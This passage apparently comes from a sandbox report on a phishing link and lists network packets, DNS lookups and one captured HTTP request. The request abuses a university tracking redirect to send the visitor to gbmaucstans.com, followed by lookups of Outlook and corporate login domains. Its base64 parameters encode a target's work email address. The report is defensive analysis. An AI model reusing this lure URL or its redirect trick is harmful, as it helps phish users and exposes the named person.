                                                      Apr 16, 2024 13:57:18.668399096 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.668443918 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.668486118 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.668530941 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.668570042 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.668602943 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.668636084 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.668678999 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.668718100 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.668751955 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.668765068 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.668812990 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.711580038 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.711633921 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.711678982 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.711711884 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.711747885 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.711771011 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.889318943 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.889368057 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.889440060 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.889473915 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.889504910 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.889525890 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.889530897 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.889559031 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.889606953 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.889612913 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.889656067 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.889674902 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.889713049 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.889755964 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.890256882 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.890300989 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.890362978 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.890381098 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:18.890417099 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:18.890491962 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:19.109867096 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:19.109884977 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:19.109924078 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:19.109956980 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:19.109993935 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:19.110034943 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:19.110059023 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:19.110130072 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:19.110152006 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:19.110212088 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:19.110219955 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:19.110230923 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:19.110236883 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:19.110300064 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:19.110328913 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:19.110375881 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:19.111191988 CEST49758443192.168.2.585.119.134.168
                                                      Apr 16, 2024 13:57:19.111221075 CEST4434975885.119.134.168192.168.2.5
                                                      Apr 16, 2024 13:57:20.489900112 CEST4973080192.168.2.5198.98.54.45
                                                      Apr 16, 2024 13:57:20.583606005 CEST4972980192.168.2.5198.98.54.45
                                                      Apr 16, 2024 13:57:20.616370916 CEST8049730198.98.54.45192.168.2.5
                                                      Apr 16, 2024 13:57:20.710315943 CEST8049729198.98.54.45192.168.2.5
                                                      Apr 16, 2024 13:57:28.658312082 CEST8049715198.98.54.45192.168.2.5
                                                      Apr 16, 2024 13:57:28.665477037 CEST4971580192.168.2.5198.98.54.45
                                                      Apr 16, 2024 13:57:29.064683914 CEST4971580192.168.2.5198.98.54.45
                                                      Apr 16, 2024 13:57:29.191381931 CEST8049715198.98.54.45192.168.2.5
                                                      Apr 16, 2024 13:57:30.492743015 CEST49761443192.168.2.564.233.177.147
                                                      Apr 16, 2024 13:57:30.492796898 CEST4434976164.233.177.147192.168.2.5
                                                      Apr 16, 2024 13:57:30.492860079 CEST49761443192.168.2.564.233.177.147
                                                      Apr 16, 2024 13:57:30.493237972 CEST49761443192.168.2.564.233.177.147
                                                      Apr 16, 2024 13:57:30.493254900 CEST4434976164.233.177.147192.168.2.5
                                                      Apr 16, 2024 13:57:30.706995010 CEST4434976164.233.177.147192.168.2.5
                                                      Apr 16, 2024 13:57:30.707458019 CEST49761443192.168.2.564.233.177.147
                                                      Apr 16, 2024 13:57:30.707479000 CEST4434976164.233.177.147192.168.2.5
                                                      Apr 16, 2024 13:57:30.707941055 CEST4434976164.233.177.147192.168.2.5
                                                      Apr 16, 2024 13:57:30.708302021 CEST49761443192.168.2.564.233.177.147
                                                      Apr 16, 2024 13:57:30.708386898 CEST4434976164.233.177.147192.168.2.5
                                                      Apr 16, 2024 13:57:30.755392075 CEST49761443192.168.2.564.233.177.147
                                                      Apr 16, 2024 13:57:35.575124025 CEST8049729198.98.54.45192.168.2.5
                                                      Apr 16, 2024 13:57:35.575196028 CEST4972980192.168.2.5198.98.54.45
                                                      Apr 16, 2024 13:57:35.614456892 CEST8049730198.98.54.45192.168.2.5
                                                      Apr 16, 2024 13:57:35.614515066 CEST4973080192.168.2.5198.98.54.45
                                                      Apr 16, 2024 13:57:35.993109941 CEST4973080192.168.2.5198.98.54.45
                                                      Apr 16, 2024 13:57:35.993205070 CEST4972980192.168.2.5198.98.54.45
                                                      Apr 16, 2024 13:57:36.119586945 CEST8049730198.98.54.45192.168.2.5
                                                      Apr 16, 2024 13:57:36.119694948 CEST8049729198.98.54.45192.168.2.5
                                                      Apr 16, 2024 13:57:40.740176916 CEST4434976164.233.177.147192.168.2.5
                                                      Apr 16, 2024 13:57:40.740338087 CEST4434976164.233.177.147192.168.2.5
                                                      Apr 16, 2024 13:57:40.740648985 CEST49761443192.168.2.564.233.177.147
                                                      Apr 16, 2024 13:57:41.991576910 CEST49761443192.168.2.564.233.177.147
                                                      Apr 16, 2024 13:57:41.991595984 CEST4434976164.233.177.147192.168.2.5
                                                      Apr 16, 2024 13:57:43.286310911 CEST4971680192.168.2.5198.98.54.45
                                                      Apr 16, 2024 13:57:43.413803101 CEST8049716198.98.54.45192.168.2.5
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 16, 2024 13:56:25.870094061 CEST53579111.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:25.919642925 CEST53565111.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:26.547215939 CEST53542091.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:27.644597054 CEST5586753192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:27.645077944 CEST6069853192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:27.761092901 CEST53558671.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:27.777025938 CEST53606981.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:28.245553970 CEST5512353192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:28.245953083 CEST5942153192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:28.394958973 CEST53594211.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:28.395175934 CEST53551231.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:29.064351082 CEST4978253192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:29.064829111 CEST6104853192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:29.168535948 CEST53497821.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:29.169001102 CEST53610481.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:30.442838907 CEST6255453192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:30.443540096 CEST6528953192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:30.547143936 CEST53625541.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:30.547986031 CEST53652891.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:31.138118029 CEST4965853192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:31.138366938 CEST5071353192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:31.242233038 CEST53496581.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:31.244060993 CEST53507131.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:32.615241051 CEST5727253192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:32.615545988 CEST6498653192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:32.720138073 CEST53572721.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:32.720499992 CEST53649861.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:35.057368040 CEST6086553192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:35.057522058 CEST6436153192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:35.177241087 CEST53643611.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:35.196501017 CEST53608651.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:43.979459047 CEST53648581.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:58.314196110 CEST6531853192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:58.314601898 CEST6072353192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:58.418834925 CEST53653181.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:58.418898106 CEST53607231.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:59.029172897 CEST6160853192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:59.029617071 CEST5027753192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:59.133806944 CEST53502771.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:59.133874893 CEST53616081.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:59.790815115 CEST6224153192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:59.791191101 CEST5239053192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:56:59.895148993 CEST53622411.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:56:59.895740032 CEST53523901.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:57:01.026581049 CEST4968253192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:57:01.027081013 CEST6493553192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:57:01.381921053 CEST53496821.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:57:01.395597935 CEST53649351.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:57:02.723073006 CEST53634721.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:57:12.581041098 CEST5353253192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:57:12.581877947 CEST5675453192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:57:12.948724985 CEST53567541.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:57:12.954576015 CEST53535321.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:57:13.592179060 CEST5300353192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:57:13.592437029 CEST5859553192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:57:13.698487043 CEST53530031.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:57:13.705907106 CEST53585951.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:57:14.666172981 CEST5519053192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:57:14.666688919 CEST6100953192.168.2.51.1.1.1
                                                      Apr 16, 2024 13:57:14.759629011 CEST53512301.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:57:14.773000956 CEST53551901.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:57:14.775557041 CEST53610091.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:57:25.235517979 CEST53638331.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:57:25.602910042 CEST53654251.1.1.1192.168.2.5
                                                      Apr 16, 2024 13:57:52.971263885 CEST53601631.1.1.1192.168.2.5
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Apr 16, 2024 13:56:27.644597054 CEST192.168.2.51.1.1.10x2a0Standard query (0)cubes.concordia.caA (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:27.645077944 CEST192.168.2.51.1.1.10xa9eeStandard query (0)cubes.concordia.ca65IN (0x0001)false
                                                      Apr 16, 2024 13:56:28.245553970 CEST192.168.2.51.1.1.10x87e5Standard query (0)gbmaucstans.comA (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:28.245953083 CEST192.168.2.51.1.1.10xbee9Standard query (0)gbmaucstans.com65IN (0x0001)false
                                                      Apr 16, 2024 13:56:29.064351082 CEST192.168.2.51.1.1.10xea6cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:29.064829111 CEST192.168.2.51.1.1.10xc273Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Apr 16, 2024 13:56:30.442838907 CEST192.168.2.51.1.1.10xfadeStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:30.443540096 CEST192.168.2.51.1.1.10xbc65Standard query (0)www.google.com65IN (0x0001)false
                                                      Apr 16, 2024 13:56:31.138118029 CEST192.168.2.51.1.1.10x727aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:31.138366938 CEST192.168.2.51.1.1.10x99c2Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Apr 16, 2024 13:56:32.615241051 CEST192.168.2.51.1.1.10x6c71Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:32.615545988 CEST192.168.2.51.1.1.10x4538Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Apr 16, 2024 13:56:35.057368040 CEST192.168.2.51.1.1.10x3dd3Standard query (0)gbmaucstans.comA (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:35.057522058 CEST192.168.2.51.1.1.10xe885Standard query (0)gbmaucstans.com65IN (0x0001)false
                                                      Apr 16, 2024 13:56:58.314196110 CEST192.168.2.51.1.1.10x6d2dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:58.314601898 CEST192.168.2.51.1.1.10xde8dStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.029172897 CEST192.168.2.51.1.1.10x78ecStandard query (0)outlook.office.comA (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.029617071 CEST192.168.2.51.1.1.10x2963Standard query (0)outlook.office.com65IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.790815115 CEST192.168.2.51.1.1.10xef74Standard query (0)outlook.office.comA (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.791191101 CEST192.168.2.51.1.1.10xd53eStandard query (0)outlook.office.com65IN (0x0001)false
                                                      Apr 16, 2024 13:57:01.026581049 CEST192.168.2.51.1.1.10x645fStandard query (0)bc1qhefefhkqg4a9rhm372pr0wj.comA (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:57:01.027081013 CEST192.168.2.51.1.1.10xb5c7Standard query (0)bc1qhefefhkqg4a9rhm372pr0wj.com65IN (0x0001)false
                                                      Apr 16, 2024 13:57:12.581041098 CEST192.168.2.51.1.1.10xee1eStandard query (0)bc1qhefefhkqg4a9rhm372pr0wj.comA (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:57:12.581877947 CEST192.168.2.51.1.1.10x82f7Standard query (0)bc1qhefefhkqg4a9rhm372pr0wj.com65IN (0x0001)false
                                                      Apr 16, 2024 13:57:13.592179060 CEST192.168.2.51.1.1.10x8dcbStandard query (0)federation.cgi.comA (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:57:13.592437029 CEST192.168.2.51.1.1.10x3e84Standard query (0)federation.cgi.com65IN (0x0001)false
                                                      Apr 16, 2024 13:57:14.666172981 CEST192.168.2.51.1.1.10xdc3cStandard query (0)federation.cgi.comA (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:57:14.666688919 CEST192.168.2.51.1.1.10x9822Standard query (0)federation.cgi.com65IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Apr 16, 2024 13:56:27.761092901 CEST1.1.1.1192.168.2.50x2a0No error (0)cubes.concordia.ca132.205.186.10A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:28.395175934 CEST1.1.1.1192.168.2.50x87e5No error (0)gbmaucstans.com198.98.54.45A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:29.168535948 CEST1.1.1.1192.168.2.50xea6cNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:29.168535948 CEST1.1.1.1192.168.2.50xea6cNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:29.169001102 CEST1.1.1.1192.168.2.50xc273No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Apr 16, 2024 13:56:30.547143936 CEST1.1.1.1192.168.2.50xfadeNo error (0)www.google.com64.233.177.147A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:30.547143936 CEST1.1.1.1192.168.2.50xfadeNo error (0)www.google.com64.233.177.106A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:30.547143936 CEST1.1.1.1192.168.2.50xfadeNo error (0)www.google.com64.233.177.103A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:30.547143936 CEST1.1.1.1192.168.2.50xfadeNo error (0)www.google.com64.233.177.104A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:30.547143936 CEST1.1.1.1192.168.2.50xfadeNo error (0)www.google.com64.233.177.99A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:30.547143936 CEST1.1.1.1192.168.2.50xfadeNo error (0)www.google.com64.233.177.105A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:30.547986031 CEST1.1.1.1192.168.2.50xbc65No error (0)www.google.com65IN (0x0001)false
                                                      Apr 16, 2024 13:56:31.242233038 CEST1.1.1.1192.168.2.50x727aNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:31.242233038 CEST1.1.1.1192.168.2.50x727aNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:31.244060993 CEST1.1.1.1192.168.2.50x99c2No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Apr 16, 2024 13:56:32.720138073 CEST1.1.1.1192.168.2.50x6c71No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:32.720138073 CEST1.1.1.1192.168.2.50x6c71No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:32.720499992 CEST1.1.1.1192.168.2.50x4538No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Apr 16, 2024 13:56:35.196501017 CEST1.1.1.1192.168.2.50x3dd3No error (0)gbmaucstans.com198.98.54.45A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:42.863528967 CEST1.1.1.1192.168.2.50x215cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:42.863528967 CEST1.1.1.1192.168.2.50x215cNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:56.587842941 CEST1.1.1.1192.168.2.50x5465No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:56.587842941 CEST1.1.1.1192.168.2.50x5465No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:58.418834925 CEST1.1.1.1192.168.2.50x6d2dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:58.418834925 CEST1.1.1.1192.168.2.50x6d2dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:58.418898106 CEST1.1.1.1192.168.2.50xde8dNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133806944 CEST1.1.1.1192.168.2.50x2963No error (0)outlook.office.comsubstrate.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133806944 CEST1.1.1.1192.168.2.50x2963No error (0)substrate.office.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133806944 CEST1.1.1.1192.168.2.50x2963No error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133806944 CEST1.1.1.1192.168.2.50x2963No error (0)ooc-g2.tm-4.office.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133806944 CEST1.1.1.1192.168.2.50x2963No error (0)outlook.ms-acdc.office.comLYH-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133874893 CEST1.1.1.1192.168.2.50x78ecNo error (0)outlook.office.comsubstrate.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133874893 CEST1.1.1.1192.168.2.50x78ecNo error (0)substrate.office.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133874893 CEST1.1.1.1192.168.2.50x78ecNo error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133874893 CEST1.1.1.1192.168.2.50x78ecNo error (0)ooc-g2.tm-4.office.com52.96.165.50A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133874893 CEST1.1.1.1192.168.2.50x78ecNo error (0)ooc-g2.tm-4.office.com52.96.36.130A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133874893 CEST1.1.1.1192.168.2.50x78ecNo error (0)ooc-g2.tm-4.office.com52.96.182.18A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133874893 CEST1.1.1.1192.168.2.50x78ecNo error (0)ooc-g2.tm-4.office.com52.96.165.242A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133874893 CEST1.1.1.1192.168.2.50x78ecNo error (0)ooc-g2.tm-4.office.com52.96.184.18A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133874893 CEST1.1.1.1192.168.2.50x78ecNo error (0)ooc-g2.tm-4.office.com52.96.119.82A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133874893 CEST1.1.1.1192.168.2.50x78ecNo error (0)ooc-g2.tm-4.office.com52.96.37.210A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.133874893 CEST1.1.1.1192.168.2.50x78ecNo error (0)ooc-g2.tm-4.office.com52.96.165.130A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.895148993 CEST1.1.1.1192.168.2.50xef74No error (0)outlook.office.comsubstrate.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.895148993 CEST1.1.1.1192.168.2.50xef74No error (0)substrate.office.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.895148993 CEST1.1.1.1192.168.2.50xef74No error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.895148993 CEST1.1.1.1192.168.2.50xef74No error (0)ooc-g2.tm-4.office.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.895148993 CEST1.1.1.1192.168.2.50xef74No error (0)outlook.ms-acdc.office.comLYH-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.895148993 CEST1.1.1.1192.168.2.50xef74No error (0)LYH-efz.ms-acdc.office.com52.96.122.2A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.895148993 CEST1.1.1.1192.168.2.50xef74No error (0)LYH-efz.ms-acdc.office.com52.96.28.2A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.895148993 CEST1.1.1.1192.168.2.50xef74No error (0)LYH-efz.ms-acdc.office.com52.96.28.178A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.895148993 CEST1.1.1.1192.168.2.50xef74No error (0)LYH-efz.ms-acdc.office.com52.96.189.18A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.895740032 CEST1.1.1.1192.168.2.50xd53eNo error (0)outlook.office.comsubstrate.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.895740032 CEST1.1.1.1192.168.2.50xd53eNo error (0)substrate.office.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:56:59.895740032 CEST1.1.1.1192.168.2.50xd53eNo error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 16, 2024 13:57:01.381921053 CEST1.1.1.1192.168.2.50x645fNo error (0)bc1qhefefhkqg4a9rhm372pr0wj.com185.216.70.4A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:57:12.954576015 CEST1.1.1.1192.168.2.50xee1eNo error (0)bc1qhefefhkqg4a9rhm372pr0wj.com185.216.70.4A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:57:13.698487043 CEST1.1.1.1192.168.2.50x8dcbNo error (0)federation.cgi.com85.119.134.168A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:57:14.773000956 CEST1.1.1.1192.168.2.50xdc3cNo error (0)federation.cgi.com85.119.134.168A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:57:38.361119032 CEST1.1.1.1192.168.2.50xf6aeNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                      Apr 16, 2024 13:57:38.361119032 CEST1.1.1.1192.168.2.50xf6aeNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                      • gbmaucstans.com
                                                        • challenges.cloudflare.com
                                                        • cdnjs.cloudflare.com
                                                        • outlook.office.com
                                                        • bc1qhefefhkqg4a9rhm372pr0wj.com
                                                        • federation.cgi.com
                                                      • https:
                                                        • www.bing.com
                                                      • fs.microsoft.com
                                                      • cubes.concordia.ca
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.549710132.205.186.10805528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      Apr 16, 2024 13:56:27.926177979 CEST727OUTGET /track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20= HTTP/1.1
                                                      Host: cubes.concordia.ca
                                                      Connection: keep-alive
                                                      Upgrade-Insecure-Requests: 1
